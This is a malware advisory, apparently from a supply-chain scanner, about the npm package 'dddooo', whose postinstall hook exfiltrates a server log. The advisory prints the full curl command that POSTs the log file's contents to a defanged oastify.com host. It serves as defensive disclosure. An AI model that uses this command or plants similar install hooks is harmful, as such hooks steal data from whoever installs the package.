LWA-2026-5967 MAL-2026-6460 ↗ confirmed malware

dddooo@1.0.0

Malicious code in dddooo (npm)

T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel

Analysis

The package "dddooo" 1.0.0 contains a postinstall lifecycle hook that exfiltrates server log data via HTTP. On install, the hook executes: curl -X POST -d "$(cat /data/logs/monitor-2026-06-16.log)" hxxp://3dhd6wwmusbh04m22igmzvb4hvnmblza[.]oastify[.]com/data — reading the file /data/logs/monitor-2026-06-16.log (likely an Nginx, Apache, or application access log) and POSTing its contents to the external host 3dhd6wwmusbh04m22igmzvb4hvnmblza[.]oastify[.]com (an interactsh/Burp Collaborator-style intercept service). The published module code (index.js) is a benign-looking string utility library with no malicious logic visible at runtime; all malicious behaviour runs during the install lifecycle phase via the shell hook. No repository URL, no homepage, and the package name is a meaningless string with no relation to any well-known library.

analyzed by
Leitwacht
first seen
Jun 25, 2026, 09:58 AM
analyzed
Jun 25, 2026, 09:59 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.